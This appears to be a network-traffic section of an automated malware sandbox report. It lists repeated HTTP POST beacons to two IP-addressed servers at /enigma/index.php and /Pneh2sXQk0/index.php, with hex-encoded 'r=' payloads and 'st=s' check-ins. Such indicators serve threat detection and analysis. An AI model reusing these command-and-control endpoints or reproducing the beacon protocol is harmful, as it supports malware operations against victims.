                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
